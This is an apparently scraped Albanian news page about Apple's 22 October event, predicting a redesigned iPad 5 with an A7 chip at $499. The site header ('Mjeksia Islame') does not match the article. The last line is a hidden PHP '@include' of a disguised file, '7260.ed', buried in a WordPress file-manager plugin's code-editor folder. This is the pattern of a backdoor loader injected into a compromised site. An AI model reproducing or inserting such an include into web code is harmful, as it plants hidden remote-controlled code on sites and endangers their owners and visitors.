Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Çka do të prezantoj Apple me 22 tetor?

Çka do të prezantoj Apple me 22 tetor?

apple shqip

Pas prezantimit muajin e kaluar të dy modeleve të iPhonave të ri, kompania Apple ditën e martë me 22 tetor ka paralajmëruar konferencë ku do të prezantoj prodhimet e reja.

Për herë të parë pas prezantimit në 2010, Apple do të ndryshon dizajnin e iPad klasik (modeli me ekan 9.7 inç), i cili sipas iPad mini do të ketë ram më të ngusht rreth ekranit, kështu që tableti do të jetë më i vogël, më i lehtë dhe më i bukur.

Përveç pamjes, iPad 5 do të ketë edhe ndryshime në brendësi. Apple në të do të integroj procesor 64 bit A7, që është tek modeli iPhone 5S.

IPad 5 do të ketë grafikë më të mirë, kamerë më kualitative ndërsa në shitje do të paraqitet 10 ditë pas prezantimit me çmim prej 499 dollarë për verzionin 16GB.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";